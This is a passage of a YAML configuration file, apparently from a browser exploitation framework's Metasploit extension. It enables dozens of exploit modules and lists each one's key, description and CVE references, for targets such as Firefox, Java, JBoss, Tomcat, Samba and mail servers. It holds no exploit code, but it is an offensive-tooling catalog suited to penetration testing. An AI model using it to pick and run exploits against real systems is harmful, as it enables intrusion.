- http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html
- - URL
- http://blog.cr0.org/2009/05/write-once-own-everyone.html
- - URL
- http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1
path: extensions/metasploit/
class: Msf_module
msf_mozilla_navigatorjava:
enable: true
msf: true
msf_key: multi/browser/mozilla_navigatorjava
name: Mozilla Suite/Firefox Navigator Object Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution vulnerability in the Mozilla\n\
\t\t\t\tSuite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit\n\
\t\t\t\trequires the Java plugin to be installed.\n\
\t\t\t"
authors:
- - CVE
- 2006-3677
- - OSVDB
- "27559"
- - BID
- "19192"
- - URL
- http://www.mozilla.org/security/announce/mfsa2006-45.html
- - URL
- http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html
path: extensions/metasploit/
class: Msf_module
msf_mozilla_compareto:
enable: true
msf: true
msf_key: multi/browser/mozilla_compareto
name: Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution vulnerability in the Mozilla\n\
\t\t\t\tSuite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit\n\
\t\t\t\tmodule is a direct port of Aviv Raff's HTML PoC.\n\
\t\t\t"
authors:
- - CVE
- 2005-2265
- - OSVDB
- "17968"
- - BID
- "14242"
- - URL
- http://www.mozilla.org/security/announce/mfsa2005-50.html
path: extensions/metasploit/
class: Msf_module
msf_java_rmi_connection_impl:
enable: true
msf: true
msf_key: multi/browser/java_rmi_connection_impl
name: Java RMIConnectionImpl Deserialization Privilege Escalation Exploit
category: Metasploit
description: "\n\
\t\t\tThis module exploits a vulnerability in the Java Runtime Environment\n\
\t\t\tthat allows to deserialize a MarshalledObject containing a custom\n\
\t\t\tclassloader under a privileged context. The vulnerability affects\n\
\t\t\tversion 6 prior to update 19 and version 5 prior to update 23.\n\
\t\t\t"
authors:
- - CVE
- 2010-0094
- - OSVDB
- "63484"
- - URL
- http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-rmiconnectionimpl-deserialization.html
path: extensions/metasploit/
class: Msf_module
msf_java_getsoundbank_bof:
enable: true
msf: true
msf_key: multi/browser/java_getsoundbank_bof
name: Sun Java JRE getSoundbank file:// URI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a flaw in the getSoundbank function in the Sun JVM.\n\n\
\t\t\t\tThe payload is serialized and passed to the applet via PARAM tags. It must be\n\
\t\t\t\ta native payload.\n\n\
\t\t\t\tThe effected Java versions are JDK and JRE 6 Update 16 and earlier,\n\
\t\t\t\tJDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and\n\
\t\t\t\tearlier, and SDK and JRE 1.3.1_26 and earlier.\n\n\
\t\t\t\tNOTE: Although all of the above versions are reportedly vulnerable, only\n\
\t\t\t\t1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.\n\
\t\t\t"
authors:
- - CVE
- 2009-3867
- - OSVDB
- "59711"
- - BID
- "36881"
- - URL
- http://zerodayinitiative.com/advisories/ZDI-09-076/
path: extensions/metasploit/
class: Msf_module
msf_firefox_queryinterface:
enable: true
msf: true
msf_key: multi/browser/firefox_queryinterface
name: Firefox location.QueryInterface() Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution vulnerability in the Mozilla\n\
\t\t\t\tFirefox browser. To reliably exploit this vulnerability, we need to fill\n\
\t\t\t\talmost a gigabyte of memory with our nop sled and payload. This module has\n\
\t\t\t\tbeen tested on OS X 10.3 with the stock Firefox 1.5.0 package.\n\
\t\t\t"
authors:
- - CVE
- 2006-0295
- - OSVDB
- "22893"
- - BID
- "16476"
- - URL
- http://www.mozilla.org/security/announce/mfsa2006-04.html
path: extensions/metasploit/
class: Msf_module
msf_itms_overflow:
enable: true
msf: true
msf_key: multi/browser/itms_overflow
name: Apple OS X iTunes 8.1.1 ITMS Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis modules exploits a stack-based buffer overflow in iTunes\n\
\t\t\t\titms:// URL parsing. It is accessible from the browser and\n\
\t\t\t\tin Safari, itms urls will be opened in iTunes automatically.\n\
\t\t\t\tBecause iTunes is multithreaded, only vfork-based payloads should\n\
\t\t\t\tbe used.\n\
\t\t\t"
authors:
- - CVE
- 2009-0950
- - OSVDB
- "54833"
- - URL
- http://support.apple.com/kb/HT3592
- - URL
- http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html
path: extensions/metasploit/
class: Msf_module
msf_wuftpd_site_exec_format:
enable: true
msf: true
msf_key: multi/ftp/wuftpd_site_exec_format
name: wu-ftpd SITE EXEC/INDEX Format String Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a format string vulnerability in versions of the\n\
\t\t\t\tWashington University FTP server older than 2.6.1. By executing\n\
\t\t\t\tspecially crafted SITE EXEC or SITE INDEX commands containing format\n\
\t\t\t\tspecifiers, an attacker can corrupt memory and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2000-0573
- - OSVDB
- "11805"
- - BID
- "1387"
path: extensions/metasploit/
class: Msf_module
msf_svnserve_date:
enable: true
msf: true
msf_key: multi/svn/svnserve_date
name: Subversion Date Svnserve
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for the Subversion date parsing overflow. This\n\
\t\t\t\texploit is for the svnserve daemon (svn:// protocol) and will not work\n\
\t\t\t\tfor Subversion over webdav (http[s]://). This exploit should never\n\
\t\t\t\tcrash the daemon, and should be safe to do multi-hits.\n\n\
\t\t\t\t**WARNING** This exploit seems to (not very often, I've only seen\n\
\t\t\t\tit during testing) corrupt the subversion database, so be careful!\n\
\t\t\t"
authors:
- - CVE
- 2004-0397
- - OSVDB
- "6301"
- - BID
- "10386"
- - URL
- http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html
- - MIL
- "68"
path: extensions/metasploit/
class: Msf_module
msf_spree_searchlogic_exec:
enable: true
msf: true
msf_key: multi/http/spree_searchlogic_exec
name: Spreecommerce < 0.50.0 Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\
\t\t\t\t\tSpreecommerce API searchlogic. Unvalidated input is called via the \n\
\t\t\t\t\tRuby send method allowing command execution.\n\
\t\t\t"
authors:
- - OSVDB
- "71900"
- - URL
- http://www.spreecommerce.com/blog/2011/04/19/security-fixes/
path: extensions/metasploit/
class: Msf_module
msf_jboss_maindeployer:
enable: true
msf: true
msf_key: multi/http/jboss_maindeployer
name: JBoss JMX Console Deployer Upload and Execute
category: Metasploit
description: "\n\
\t\t\t\t\tThis module can be used to execute a payload on JBoss servers that have\n\
\t\t\t\tan exposed \"jmx-console\" application. The payload is put on the server by\n\
\t\t\t\tusing the jboss.system:MainDeployer functionality. To accomplish this, a\n\
\t\t\t\ttemporary HTTP server is created to serve a WAR archive containing our\n\
\t\t\t\tpayload. This method will only work if the target server allows outbound\n\
\t\t\t\tconnections to us.\n\
\t\t\t"
authors:
- - CVE
- 2007-1036
- - CVE
- 2010-0738
- - OSVDB
- "33744"
- - URL
- http://www.redteam-pentesting.de/publications/jboss
- - URL
- https://bugzilla.redhat.com/show_bug.cgi?id=574105
path: extensions/metasploit/
class: Msf_module
msf_jboss_bshdeployer:
enable: true
msf: true
msf_key: multi/http/jboss_bshdeployer
name: JBoss JMX Console Beanshell Deployer WAR upload and deployment
category: Metasploit
description: "\n\
\t\t\t\t\tThis module can be used to install a WAR file payload on JBoss servers that have\n\
\t\t\t\tan exposed \"jmx-console\" application. The payload is put on the server by\n\
\t\t\t\tusing the jboss.system:BSHDeployer\\'s createScriptDeployment() method.\n\
\t\t\t"
authors:
- - CVE
- 2010-0738
- - URL
- http://www.redteam-pentesting.de/publications/jboss
- - URL
- https://bugzilla.redhat.com/show_bug.cgi?id=574105
path: extensions/metasploit/
class: Msf_module
msf_sun_jsws_dav_options:
enable: true
msf: true
msf_key: multi/http/sun_jsws_dav_options
name: Sun Java System Web Server WebDAV OPTIONS Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Sun Java Web Server prior to\n\
\t\t\t\tversion 7 Update 8. By sending an \"OPTIONS\" request with an overly long\n\
\t\t\t\tpath, attackers can execute arbitrary code. In order to reach the vulnerable\n\
\t\t\t\tcode, the attacker must also specify the path to a directory with WebDAV\n\
\t\t\t\tenabled.\n\n\
\t\t\t\tThis exploit was tested and confirmed to work on Windows XP SP3 without DEP.\n\
\t\t\t\tVersions for other platforms are vulnerable as well.\n\n\
\t\t\t\tThe vulnerability was originally discovered and disclosed by Evgeny Legerov of\n\
\t\t\t\tIntevydis.\n\
\t\t\t"
authors:
- - CVE
- 2010-0361
- - OSVDB
- "61851"
- - URL
- http://intevydis.blogspot.com/2010/01/sun-java-system-web-server-70u7-webdav.html
- - URL
- http://sunsolve.sun.com/search/document.do?assetkey=1-66-275850-1
path: extensions/metasploit/
class: Msf_module
msf_jboss_deploymentfilerepository:
enable: true
msf: true
msf_key: multi/http/jboss_deploymentfilerepository
name: JBoss Java Class DeploymentFileRepository WAR deployment
category: Metasploit
description: "\n\
\t\t\t\t\tThis module uses the DeploymentFileRepository class in\n\
\t\t\t\tJBoss Application Server (jbossas) to deploy a JSP file\n\
\t\t\t\tin a minimal WAR context.\n\
\t\t\t"
authors:
- - CVE
- 2010-0738
- - URL
- http://www.redteam-pentesting.de/publications/jboss
- - URL
- https://bugzilla.redhat.com/show_bug.cgi?id=574105
path: extensions/metasploit/
class: Msf_module
msf_freenas_exec_raw:
enable: true
msf: true
msf_key: multi/http/freenas_exec_raw
name: FreeNAS exec_raw.php Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution flaw\n\
\t\t\t\tin FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL\n\
\t\t\t\tto the exec_raw.php page, an attacker may be able to execute arbitrary\n\
\t\t\t\tcommands.\n\n\
\t\t\t\tNOTE: This module works best with php/meterpreter payloads.\n\
\t\t\t"
authors:
- - URL
- http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download
path: extensions/metasploit/
class: Msf_module
msf_axis2_deployer:
enable: true
msf: true
msf_key: multi/http/axis2_deployer
name: Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module logs in to an Axis2 Web Admin Module instance using a specific user/pass\n\
\t\t\t\tand uploads and executes commands via deploying a malicious web service by using SOAP.\n\
\t\t\t"
authors:
- - URL
- http://www.rapid7.com/security-center/advisories/R7-0037.jsp
- - URL
- http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf
- - CVE
- 2010-0219
path: extensions/metasploit/
class: Msf_module
msf_axis2_deployer_rest:
enable: true
msf: true
msf_key: multi/http/axis2_deployer_rest
name: Axis2 Authenticated Code Execution (via REST)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module logs in to an Axis2 Web Admin Module instance using a specific user/pass\n\
\t\t\t\tand uploads and executes commands via deploying a malicious web service by using REST.\n\
\t\t\t"
authors:
- - URL
- http://www.rapid7.com/security-center/advisories/R7-0037.jsp
- - URL
- http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf
- - CVE
- 2010-0219
path: extensions/metasploit/
class: Msf_module
msf_tomcat_mgr_deploy:
enable: true
msf: true
msf_key: multi/http/tomcat_mgr_deploy
name: Apache Tomcat Manager Application Deployer Authenticated Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module can be used to execute a payload on Apache Tomcat servers that\n\
\t\t\t\thave an exposed \"manager\" application. The payload is uploaded as a WAR archive\n\
\t\t\t\tcontaining a jsp application using a PUT request.\n\n\
\t\t\t\tThe manager application can also be abused using /manager/html/upload, but that\n\
\t\t\t\tmethod is not implemented in this module.\n\
\t\t\t"
authors:
- - CVE
- 2009-3843
- - OSVDB
- "60317"
- - CVE
- 2009-4189
- - OSVDB
- "60670"
- - CVE
- 2009-4188
- - BID
- "38084"
- - CVE
- 2010-0557
- - URL
- http://www-01.ibm.com/support/docview.wss?uid=swg21419179
- - CVE
- 2010-4094
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-214/
- - CVE
- 2009-3548
- - OSVDB
- "60176"
- - BID
- "36954"
- - URL
- http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html
path: extensions/metasploit/
class: Msf_module
msf_describe:
enable: true
msf: true
msf_key: multi/realserver/describe
name: RealServer Describe Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a buffer overflow in RealServer 7/8/9\n\
\t\t\t\tand was based on Johnny Cyberpunk's THCrealbad exploit. This\n\
\t\t\t\tcode should reliably exploit Linux, BSD, and Windows-based\n\
\t\t\t\tservers.\n\
\t\t\t"
authors:
- - CVE
- 2002-1643
- - OSVDB
- "4468"
- - URL
- http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html
path: extensions/metasploit/
class: Msf_module
msf_ntp_overflow:
enable: true
msf: true
msf_key: multi/ntp/ntp_overflow
name: NTP daemon readvar Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack based buffer overflow in the\n\
\t\t\t\tntpd and xntpd service. By sending an overly long 'readvar'\n\
\t\t\t\trequest it is possible to execute code remotely. As the stack\n\
\t\t\t\tis corrupted, this module uses the Egghunter technique.\n\
\t\t\t"
authors:
- - CVE
- 2001-0414
- - OSVDB
- "805"
- - BID
- "2540"
- - US-CERT-VU
- "970472"
path: extensions/metasploit/
class: Msf_module
msf_peazip_command_injection:
enable: true
msf: true
msf_key: multi/fileformat/peazip_command_injection
name: PeaZip <= 2.6.1 Zip Processing Command Injection
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a command injection vulnerability in PeaZip. All\n\
\t\t\t\tversions prior to 2.6.2 are suspected vulnerable. Testing was conducted with\n\
\t\t\t\tversion 2.6.1 on Windows.\n\n\
\t\t\t\tIn order for the command to be executed, an attacker must convince someone to\n\
\t\t\t\topen a specially crafted zip file with PeaZip, and access the specially file via\n\
\t\t\t\tdouble-clicking it. By doing so, an attacker can execute arbitrary commands\n\
\t\t\t\tas the victim user.\n\
\t\t\t"
authors:
- - CVE
- 2009-2261
- - OSVDB
- "54966"
- - URL
- http://peazip.sourceforge.net/
- - URL
- http://www.exploit-db.com/exploits/8881
path: extensions/metasploit/
class: Msf_module
msf_adobe_u3d_meshcont:
enable: true
msf: true
msf_key: multi/fileformat/adobe_u3d_meshcont
name: Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an array overflow in Adobe Reader and Adobe Acrobat.\n\
\t\t\t\tAffected versions include < 7.1.4, < 8.1.7, and < 9.2. By creating a\n\
\t\t\t\tspecially crafted pdf that a contains malformed U3D data, an attacker may\n\
\t\t\t\tbe able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-2990
- - OSVDB
- "58920"
- - BID
- "36665"
- - URL
- http://sites.google.com/site/felipeandresmanzano/
- - URL
- http://www.adobe.com/support/security/bulletins/apsb09-15.html
path: extensions/metasploit/
class: Msf_module
msf_maple_maplet:
enable: true
msf: true
msf_key: multi/fileformat/maple_maplet
name: Maple Maplet File Creation and Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module harnesses Maple's ability to create files and execute commands\n\
\t\t\t\tautomatically when opening a Maplet. All versions up to 13 are suspected\n\
\t\t\t\tvulnerable. Testing was conducted with version 13 on Windows. Standard security\n\
\t\t\t\tsettings prevent code from running in a normal maple worksheet without user\n\
\t\t\t\tinteraction, but those setting do not prevent code in a Maplet from running.\n\n\
\t\t\t\tIn order for the payload to be executed, an attacker must convince someone to\n\
\t\t\t\topen a specially modified .maplet file with Maple. By doing so, an attacker can\n\
\t\t\t\texecute arbitrary code as the victim user.\n\
\t\t\t"
authors:
- - OSVDB
- "64541"
- - URL
- http://www.maplesoft.com/products/maple/
path: extensions/metasploit/
class: Msf_module
msf_handler:
enable: true
msf: true
msf_key: multi/handler
name: Generic Payload Handler
category: Metasploit
description: "\n\
\t\t\t\tThis module is a stub that provides all of the\n\
\t\t\t\tfeatures of the Metasploit payload system to exploits\n\
\t\t\t\tthat have been launched outside of the framework.\n\
\t\t\t"
authors: []
path: extensions/metasploit/
class: Msf_module
msf_nttrans:
enable: true
msf: true
msf_key: multi/samba/nttrans
name: Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module attempts to exploit a buffer overflow vulnerability present in\n\
\t\t\t\tversions 2.2.2 through 2.2.6 of Samba.\n\n\
\t\t\t\tThe Samba developers report this as:\n\
\t\t\t\t\"Bug in the length checking for encrypted password change requests from clients.\"\n\n\
\t\t\t\tThe bug was discovered and reported by the Debian Samba Maintainers.\n\
\t\t\t"
authors:
- - CVE
- 2003-0085
- - OSVDB
- "6323"
- - BID
- "7106"
- - URL
- http://www.samba.org/samba/history/samba-2.2.7a.html
path: extensions/metasploit/
class: Msf_module
msf_usermap_script:
enable: true
msf: true
msf_key: multi/samba/usermap_script
name: Samba "username map script" Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a command execution vulerability in Samba\n\
\t\t\t\tversions 3.0.20 through 3.0.25rc3 when using the non-default\n\
\t\t\t\t\"username map script\" configuration option. By specifying a username\n\
\t\t\t\tcontaining shell meta characters, attackers can execute arbitrary\n\
\t\t\t\tcommands.\n\n\
\t\t\t\tNo authentication is needed to exploit this vulnerability since\n\
\t\t\t\tthis option is used to map usernames prior to authentication!\n\
\t\t\t"
authors:
- - CVE
- 2007-2447
- - OSVDB
- "34700"
- - BID
- "23972"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
- - URL
- http://samba.org/samba/security/CVE-2007-2447.html
path: extensions/metasploit/
class: Msf_module
msf_xtacacsd_report:
enable: true
msf: true
msf_key: freebsd/tacacs/xtacacsd_report
name: XTACACSD <= 4.1.2 report() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By\n\
\t\t\t\tsending a specially crafted XTACACS packet with an overly long\n\
\t\t\t\tusername, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-7232
- - OSVDB
- "58140"
- - URL
- http://aluigi.altervista.org/adv/xtacacsdz-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_cleanup_exec:
enable: true
msf: true
msf_key: hpux/lpd/cleanup_exec
name: HP-UX LPD Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploit abuses an unpublished vulnerability in the\n\
\t\t\t\tHP-UX LPD service. This flaw allows an unauthenticated\n\
\t\t\t\tattacker to execute arbitrary commands with the privileges\n\
\t\t\t\tof the root user. The LPD service is only exploitable when\n\
\t\t\t\tthe address of the attacking system can be resolved by the\n\
\t\t\t\ttarget. This vulnerability was silently patched with the\n\
\t\t\t\tbuffer overflow flaws addressed in HP Security Bulletin\n\
\t\t\t\tHPSBUX0208-213.\n\
\t\t\t"
authors:
- - CVE
- 2002-1473
- - OSVDB
- "9638"
- - URL
- http://archives.neohapsis.com/archives/hp/2002-q3/0064.html
path: extensions/metasploit/
class: Msf_module
msf_ypops_overflow1:
enable: true
msf: true
msf_key: windows/smtp/ypops_overflow1
name: YPOPS 0.6 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the YPOPS POP3\n\
\t\t\t\tservice.\n\n\
\t\t\t\tThis is a classic stack buffer overflow for YPOPS version 0.6.\n\
\t\t\t\tPossibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to\n\
\t\t\t\tjmp ebx opcode in ws_32.dll\n\
\t\t\t"
authors:
- - CVE
- 2004-1558
- - OSVDB
- "10367"
- - BID
- "11256"
- - URL
- http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html
path: extensions/metasploit/
class: Msf_module
msf_wmailserver:
enable: true
msf: true
msf_key: windows/smtp/wmailserver
name: SoftiaCom WMailserver 1.0 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0\n\
\t\t\t\t(SMTP) via a SEH frame overwrite.\n\
\t\t\t"
authors:
- - CVE
- 2005-2287
- - OSVDB
- "17883"
- - BID
- "14213"
path: extensions/metasploit/
class: Msf_module
msf_ms03_046_exchange2000_xexch50:
enable: true
msf: true
msf_key: windows/smtp/ms03_046_exchange2000_xexch50
name: MS03-046 Exchange 2000 XEXCH50 Heap Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for the Exchange 2000 heap overflow. Due\n\
\t\t\t\tto the nature of the vulnerability, this exploit is not very\n\
\t\t\t\treliable. This module has been tested against Exchange 2000\n\
\t\t\t\tSP0 and SP3 running a Windows 2000 system patched to SP4. It\n\
\t\t\t\tnormally takes between one and 100 connection attempts to\n\
\t\t\t\tsuccessfully obtain a shell. This exploit is *very* unreliable.\n\
\t\t\t"
authors:
- - CVE
- 2003-0714
- - BID
- "8838"
- - OSVDB
- "2674"
- - MSB
- MS03-046
- - URL
- http://www.milw0rm.com/exploits/113
path: extensions/metasploit/
class: Msf_module
msf_mercury_cram_md5:
enable: true
msf: true
msf_key: windows/smtp/mercury_cram_md5
name: Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.\n\
\t\t\t\tBy sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker\n\
\t\t\t\tmay be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-4440
- - OSVDB
- "39669"
- - BID
- "25357"
path: extensions/metasploit/
class: Msf_module
msf_mailcarrier_smtp_ehlo:
enable: true
msf: true
msf_key: windows/smtp/mailcarrier_smtp_ehlo
name: TABS MailCarrier v2.51 SMTP EHLO Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the MailCarrier v2.51 suite SMTP service.\n\
\t\t\t\tThe stack is overwritten when sending an overly long EHLO command.\n\
\t\t\t"
authors:
- - CVE
- 2004-1638
- - OSVDB
- "11174"
- - BID
- "11535"
- - URL
- http://milw0rm.com/exploits/598
path: extensions/metasploit/
class: Msf_module
msf_fb_isc_attach_database:
enable: true
msf: true
msf_key: windows/misc/fb_isc_attach_database
name: Firebird Relational Database isc_attach_database() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted create request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38607"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_splayer_content_type:
enable: true
msf: true
msf_key: windows/misc/splayer_content_type
name: SPlayer 3.7 Content-Type Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in SPlayer v3.7 or piror. When SPlayer\n\
\t\t\t\trequests the URL of a media file (video or audio), it is possible to gain arbitrary\n\
\t\t\t\tremote code execution due to a buffer overflow caused by an exceeding length of data\n\
\t\t\t\tas the 'Content-Type' parameter.\n\
\t\t\t"
authors:
- - OSVDB
- "72181"
- - URL
- http://www.exploit-db.com/exploits/17243/
path: extensions/metasploit/
class: Msf_module
msf_bomberclone_overflow:
enable: true
msf: true
msf_key: windows/misc/bomberclone_overflow
name: Bomberclone 0.11.6 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.\n\
\t\t\t\tThe return address is overwritten with lstrcpyA memory address,\n\
\t\t\t\tthe second and third value are the destination buffer,\n\
\t\t\t\tthe fourth value is the source address of our buffer in the stack.\n\
\t\t\t\tThis exploit is like a return in libc.\n\n\
\t\t\t\tATTENTION\n\
\t\t\t\tThe shellcode is exec ONLY when someone try to close bomberclone.\n\
\t\t\t"
authors:
- - CVE
- 2006-0460
- - OSVDB
- "23263"
- - BID
- "16697"
- - URL
- http://www.frsirt.com/english/advisories/2006/0643
path: extensions/metasploit/
class: Msf_module
msf_mirc_privmsg_server:
enable: true
msf: true
msf_key: windows/misc/mirc_privmsg_server
name: mIRC <= 6.34 PRIVMSG Handling Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier.\n\
\t\t\t\tBy enticing a mIRC user to connect to this server module, an excessively long PRIVMSG\n\
\t\t\t\tcommand can be sent, overwriting the stack. Due to size restrictions, ordinal payloads\n\
\t\t\t\tmay be necessary. This module is based on the code by SkD.\n\
\t\t\t"
authors:
- - CVE
- 2008-4449
- - OSVDB
- "48752"
- - BID
- "31552"
- - URL
- http://www.milw0rm.com/exploits/6666
path: extensions/metasploit/
class: Msf_module
msf_ibm_tsm_rca_dicugetidentify:
enable: true
msf: true
msf_key: windows/misc/ibm_tsm_rca_dicugetidentify
name: IBM Tivoli Storage Manager Express RCA Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express Remote\n\
\t\t\t\tClient Agent service. By sending a \"dicuGetIdentify\" request packet containing a long\n\
\t\t\t\tNodeName parameter, an attacker can execute arbitrary code.\n\n\
\t\t\t\tNOTE: this exploit first connects to the CAD service to start the RCA service and obtain\n\
\t\t\t\tthe port number on which it runs. This service does not restart.\n\
\t\t\t"
authors:
- - CVE
- 2008-4828
- - OSVDB
- "54232"
- - BID
- "34803"
path: extensions/metasploit/
class: Msf_module
msf_nettransport:
enable: true
msf: true
msf_key: windows/misc/nettransport
name: NetTransport Download Manager 2.90.510 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a stack buffer overflow in NetTransport Download Manager,\n\
\t\t\t\tpart of the NetXfer suite. This module was tested\n\
\t\t\t\tsuccessfully against version 2.90.510.\n\
\t\t\t"
authors:
- - OSVDB
- "61435"
- - URL
- http://www.exploit-db.com/exploits/10911
path: extensions/metasploit/
class: Msf_module
msf_poppeeper_date:
enable: true
msf: true
msf_key: windows/misc/poppeeper_date
name: POP Peeper v3.4 DATE Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in POP Peeper v3.4.\n\
\t\t\t\tWhen a specially crafted DATE string is sent to a client,\n\
\t\t\t\tan attacker may be able to execute arbitrary code. This\n\
\t\t\t\tmodule is based off of krakowlabs code.\n\
\t\t\t"
authors:
- - CVE
- 2009-1029
- - OSVDB
- "53560"
- - BID
- "34093"
- - URL
- http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_date-bof.txt
path: extensions/metasploit/
class: Msf_module
msf_bigant_server_250:
enable: true
msf: true
msf_key: windows/misc/bigant_server_250
name: BigAnt Server 2.50 SP1 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis exploits a stack buffer overflow in the BigAnt Messaging Service,\n\
\t\t\t\tpart of the BigAnt Server product suite. This module was tested\n\
\t\t\t\tsuccessfully against version 2.50 SP1.\n\
\t\t\t"
authors:
- - CVE
- 2008-1914
- - OSVDB
- "44454"
- - URL
- http://www.exploit-db.com/exploits/9673
- - URL
- http://www.exploit-db.com/exploits/9690
path: extensions/metasploit/
class: Msf_module
msf_ib_isc_attach_database:
enable: true
msf: true
msf_key: windows/misc/ib_isc_attach_database
name: Borland InterBase isc_attach_database() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted attach request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38607"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_hp_ovtrace:
enable: true
msf: true
msf_key: windows/misc/hp_ovtrace
name: HP OpenView Operations OVTrace Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Operations version A.07.50.\n\
\t\t\t\tBy sending a specially crafted packet, a remote attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-3872
- - OSVDB
- "39527"
- - BID
- "25255"
path: extensions/metasploit/
class: Msf_module
msf_ib_svc_attach:
enable: true
msf: true
msf_key: windows/misc/ib_svc_attach
name: Borland InterBase SVC_attach() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted service attach request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38605"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_mercury_phonebook:
enable: true
msf: true
msf_key: windows/misc/mercury_phonebook
name: Mercury/32 <= v4.01b PH Server Module Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in\n\
\t\t\t\tMercury/32 <= v4.01b PH Server Module. This issue is\n\
\t\t\t\tdue to a failure of the application to properly bounds check\n\
\t\t\t\tuser-supplied data prior to copying it to a fixed size memory buffer.\n\
\t\t\t"
authors:
- - CVE
- 2005-4411
- - OSVDB
- "22103"
- - BID
- "16396"
